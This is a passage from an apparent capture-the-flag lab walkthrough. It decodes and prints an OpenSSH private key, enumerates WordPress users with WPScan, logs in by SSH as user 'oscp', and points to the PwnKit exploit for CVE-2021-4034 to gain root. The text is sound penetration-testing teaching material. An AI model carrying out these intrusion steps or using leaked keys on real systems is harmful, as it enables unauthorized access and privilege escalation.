K2drVVdlCkl6QlNjdmdsTEU5ZmxvbHNLZHhmTVFRYk1WR3FTQURuWUJUYXZhaWdRZWt1ZTBiTHNZ
ay9yWjVGaE9VUlpMVHZkbEpXeHoKYklleUM1YTVGMERsOVVZbXpDaGU0M3owRG8waVF3MTc4R0pV
UWFxc2NMbUVhdHFJaVQvMkZrRitBdmVXM2hxUGZicnc5dgpBOVFBSVVBM2xlZHFyOFhFelkvL0xx
MCtzUWcvcFV1MEtQa1kxOGk2dm5maVlIR2t5VzFTZ3J5UGg1eDlCR1RrM2VSWWNOCnc2bURiQWpY
S0tDSEdNK2RubkdOZ3ZBa3FUK2daV3ovTXB5MGVrYXVrNk5QN05Dek9STnJJWEFZRmExcld6YUV0
eXBId1kKa0NFY2ZXSkpsWjcrZmNFRmE1QjdnRXd0L2FLZEZSWFBRd2luRmxpUU1ZTW1hdThQWmJQ
aUJJcnh0SVlYeTNNSGNLQklzSgowSFNLditIYktXOWtwVEw1T29Ba0I4ZkhGMzB1alZPYjZZVHVj
MXNKS1dSSElaWTNxZTA4STJSWGVFeEZGWXU5b0x1ZzBkCnRIWWRKSEZMN2NXaU52NG1SeUo5UmNy
aFZMMVYzQ2F6TlpLS3dyYVJBQUFGZ0g5SlFMMS9TVUM5QUFBQUIzTnphQzF5YzIKRUFBQUdCQUxS
d3JFc3g3VkJmQ3ZMWWpxaEFrR0M2eWlxd2tiRzc2dW9pQnUwZllORmo3L2NQb0pGRm5pTXdVbkw0
SlN4UApYNWFKYkNuY1h6RUVHekZScWtnQTUyQVUycjJvb0VIcExudEd5N0dKUDYyZVJZVGxFV1Mw
NzNaU1ZzYzJ5SHNndVd1UmRBCjVmVkdKc3dvWHVOODlBNk5Ja01OZS9CaVZFR3FySEM1aEdyYWlJ
ay85aFpCZmdMM2x0NGFqMzI2OFBid1BVQUNGQU41WG4KYXEvRnhNMlAveTZ0UHJFSVA2Vkx0Q2o1
R05mSXVyNTM0bUJ4cE1sdFVvSzhqNGVjZlFSazVOM2tXSERjT3BnMndJMXlpZwpoeGpQblo1eGpZ
THdKS2svb0dWcy96S2N0SHBHcnBPalQrelFzemtUYXlGd0dCV3RhMXMyaExjcVI4R0pBaEhIMWlT
WldlCi9uM0JCV3VRZTRCTUxmMmluUlVWejBNSXB4WllrREdESm1ydkQyV3o0Z1NLOGJTR0Y4dHpC
M0NnU0xDZEIwaXIvaDJ5bHYKWktVeStUcUFKQWZIeHhkOUxvMVRtK21FN25OYkNTbGtSeUdXTjZu
dFBDTmtWM2hNUlJXTHZhQzdvTkhiUjJIU1J4UyszRgpvamIrSmtjaWZVWEs0VlM5VmR3bXN6V1Np
c0sya1FBQUFBTUJBQUVBQUFHQkFMQ3l6ZVp0SkFwYXFHd2I2Y2VXUWt5WFhyCmJqWmlsNDdwa05i
VjcwSldtbnhpeFkzMUtqckRLbGRYZ2t6TEpSb0RmWXAxVnUrc0VUVmxXN3RWY0JtNU1abVFPMWlB
cEQKZ1VNemx2RnFpRE5MRktVSmRUajdmcXlPQVhEZ2t2OFFrc05tRXhLb0JBakduTTl1OHJSQXlq
NVBObzF3QVdLcENMeElZMwpCaGRsbmVOYUFYRFYvY0tHRnZXMWFPTWxHQ2VhSjBEeFNBd0c1Snlz
NEtpNmtKNUVrZldvOGVsc1VXRjMwd1FrVzl5aklQClVGNUZxNnVkSlBubUVXQXB2THQ2MkllVHZG
cWcrdFB0R25WUGxlTzNsdm5DQkJJeGY4dkJrOFd0b0pWSmRKdDNoTzhjNGoKa010WHN2TGdSbHZl
MWJaVVpYNU15bUhhbE4vTEExSXNvQzRZa2cvcE1nM3M5Y1lSUmttK0d4aVVVNWJ2OWV6d000Qm1r
bwpRUHZ5VWN5ZTI4endrTzZ0Z1ZNWng0b3NySW9OOVd0RFVVZGJkbUQyVUJaMm4zQ1pNa09WOVhK
eGVqdTUxa0gxZnM4cTM5ClFYZnhkTmhCYjNZcjJSakNGVUxEeGh3RFNJSHpHN2dmSkVEYVdZY09r
TmtJYUhIZ2FWN2t4enlwWWNxTHJzMFM3QzRRQUEKQU1FQWhkbUQ3UXU1dHJ0QkYzbWdmY2RxcFpP
cTYrdFc2aGttUjBoWk5YNVo2Zm5lZFV4Ly9RWTVzd0tBRXZnTkNLSzhTbQppRlhsWWZnSDZLLzVV
blpuZ0Viak1RTVRkT09sa2JyZ3BNWWloK1pneXZLMUxvT1R5TXZWZ1Q1TE1nakpHc2FRNTM5M00y
CnlVRWlTWGVyN3E5ME42VkhZWERKaFVXWDJWM1FNY0NxcHRTQ1MxYlNxdmttTnZoUVhNQWFBUzhB
SncxOXFYV1hpbTE1U3AKV29xZGpvU1dFSnhLZUZUd1VXN1dPaVlDMkZ2NWRzM2NZT1I4Um9yYm1H
bnpkaVpneFpBQUFBd1FEaE5YS21TMG9WTWREeQozZktaZ1R1d3I4TXk1SHlsNWpyYTZvd2ovNXJK
TVVYNnNqWkVpZ1phOTZFamNldlpKeUdURjJ1Vjc3QVEyUnF3bmJiMkdsCmpkTGtjMFl0OXVicVNp
a2Q1ZjhBa1psWkJzQ0lydnVEUVpDb3haQkd1RDJEVVd6T2dLTWxmeHZGQk5RRitMV0ZndGJyU1AK
T2dCNGloZFBDMSs2RmRTalFKNzdmMWJOR0htbjBhbW9pdUpqbFVPT1BMMWNJUHp0MGh6RVJMajJx
djlEVWVsVE9VcmFuTwpjVVdyUGdyelZHVCtRdmtrakdKRlgrcjh0R1dDQU9RUlVBQUFEQkFNMGNS
aERvd09GeDUwSGtFK0hNSUoyalFJZWZ2d3BtCkJuMkZONmt3NEdMWmlWY3FVVDZhWTY4bmpMaWh0
RHBlZVN6b3BTanlLaDEwYk53UlMwREFJTHNjV2c2eGMvUjh5dWVBZUkKUmN3ODV1ZGtoTlZXcGVy
ZzRPc2lGWk1wd0txY01sdDhpNmxWbW9VQmpSdEJENGc1TVlXUkFOTzBOajlWV01UYlc5UkxpUgpr
dW9SaVNoaDZ1Q2pHQ0NIL1dmd0NvZjllbkNlajRIRWo1RVBqOG5aMGNNTnZvQVJxN1ZuQ05HVFBh
bWNYQnJmSXd4Y1ZUCjhuZksyb0RjNkxmckRtalFBQUFBbHZjMk53UUc5elkzQT0KLS0tLS1FTkQg
T1BFTlNTSCBQUklWQVRFIEtFWS0tLS0tCg==" | base64 -d
-----BEGIN OPENSSH PRIVATE KEY-----
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
8nfK2oDc6LfrDmjQAAAAlvc2NwQG9zY3A=
-----END OPENSSH PRIVATE KEY-----</code></pre></div><p>So yeah, we got the key:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">-----BEGIN OPENSSH PRIVATE KEY-----
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
8nfK2oDc6LfrDmjQAAAAlvc2NwQG9zY3A=
-----END OPENSSH PRIVATE KEY-----</code></pre></div><p>So now we needed to find the owner of this key in order to uses it as logon via SSH protocol:</p><ol start="4"><li><p><em>Initial Access as Local User &#8220;OSCP&#8220;</em></p></li></ol><p>I first try with admin, due to Username in the WordPress:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!8cjj!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb4246f5-9ade-4d59-bbbb-cae87f5ec6b7_1699x834.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!8cjj!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb4246f5-9ade-4d59-bbbb-cae87f5ec6b7_1699x834.png 424w, https://substackcdn.com/image/fetch/$s_!8cjj!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb4246f5-9ade-4d59-bbbb-cae87f5ec6b7_1699x834.png 848w, https://substackcdn.com/image/fetch/$s_!8cjj!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb4246f5-9ade-4d59-bbbb-cae87f5ec6b7_1699x834.png 1272w, https://substackcdn.com/image/fetch/$s_!8cjj!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb4246f5-9ade-4d59-bbbb-cae87f5ec6b7_1699x834.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!8cjj!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb4246f5-9ade-4d59-bbbb-cae87f5ec6b7_1699x834.png" width="1456" height="715" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/eb4246f5-9ade-4d59-bbbb-cae87f5ec6b7_1699x834.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:715,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:143612,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189852119?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb4246f5-9ade-4d59-bbbb-cae87f5ec6b7_1699x834.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!8cjj!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb4246f5-9ade-4d59-bbbb-cae87f5ec6b7_1699x834.png 424w, https://substackcdn.com/image/fetch/$s_!8cjj!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb4246f5-9ade-4d59-bbbb-cae87f5ec6b7_1699x834.png 848w, https://substackcdn.com/image/fetch/$s_!8cjj!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb4246f5-9ade-4d59-bbbb-cae87f5ec6b7_1699x834.png 1272w, https://substackcdn.com/image/fetch/$s_!8cjj!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb4246f5-9ade-4d59-bbbb-cae87f5ec6b7_1699x834.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>And WPScan:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo wpscan --url http://192.168.179.89/ --enumerate u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ &#174;
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.28
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.179.89/ [192.168.179.89]
[+] Started: Wed Mar  4 06:58:43 2026

Interesting Finding(s):

[+] Headers
. . .[SNIP]. . . 
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.179.89/wp-content/themes/twentytwenty/style.css?ver=1.2, Match: 'Version: 1.2'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 &lt;===============================================================================================================================================================&gt; (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.179.89/index.php/wp-json/wp/v2/users/?per_page=100&amp;page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
. . .[SNIP]. . . </code></pre></div><p>But it&#8217;s incorrect.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo ssh admin@192.168.179.89 -i id_rsa 
The authenticity of host '192.168.179.89 (192.168.179.89)' can't be established.
ED25519 key fingerprint is SHA256:OORLHLygIlTRZ4nXi9nq+WIrJ26fv7tfgvVHm8FaAzE.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.179.89' (ED25519) to the list of known hosts.
admin@192.168.179.89: Permission denied (publickey).</code></pre></div><p>Until I&#8217;ve tried OSCP:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo ssh oscp@192.168.179.89 -i id_rsa
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 System information disabled due to load higher than 1.0


381 updates can be installed immediately.
271 of these updates are security updates.
To see these additional updates run: apt list --upgradable



The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

-bash-5.0$ id
uid=1000(oscp) gid=1000(oscp) groups=1000(oscp),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)</code></pre></div><p>And we&#8217;re in.</p><ol start="5"><li><p><em>PrivEsc via CVE-2021-4034 (PkExec)</em></p></li></ol><p>Just:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">-bash-5.0$ uname -a
Linux oscp 5.4.0-40-generic #44-Ubuntu SMP Tue Jun 23 00:01:04 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux</code></pre></div><p>So just fire:</p><ul><li><p><a href="https://github.com/ly4k/PwnKit">github.com/ly4k/PwnKit</a></p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!sgsm!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25151610-873d-4b72-8151-3796608b37ad_1308x595.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!sgsm!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25151610-873d-4b72-8151-3796608b37ad_1308x595.png 424w, https://substackcdn.com/image/fetch/$s_!sgsm!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25151610-873d-4b72-8151-3796608b37ad_1308x595.png 848w, https://substackcdn.com/image/fetch/$s_!sgsm!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25151610-873d-4b72-8151-3796608b37ad_1308x595.png 1272w, https://substackcdn.com/image/fetch/$s_!sgsm!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25151610-873d-4b72-8151-3796608b37ad_1308x595.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!sgsm!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25151610-873d-4b72-8151-3796608b37ad_1308x595.png" width="1308" height="595" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/25151610-873d-4b72-8151-3796608b37ad_1308x595.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:595,&quot;width&quot;:1308,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:126029,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189852119?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25151610-873d-4b72-8151-3796608b37ad_1308x595.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!sgsm!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25151610-873d-4b72-8151-3796608b37ad_1308x595.png 424w, https://substackcdn.com/image/fetch/$s_!sgsm!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25151610-873d-4b72-8151-3796608b37ad_1308x595.png 848w, 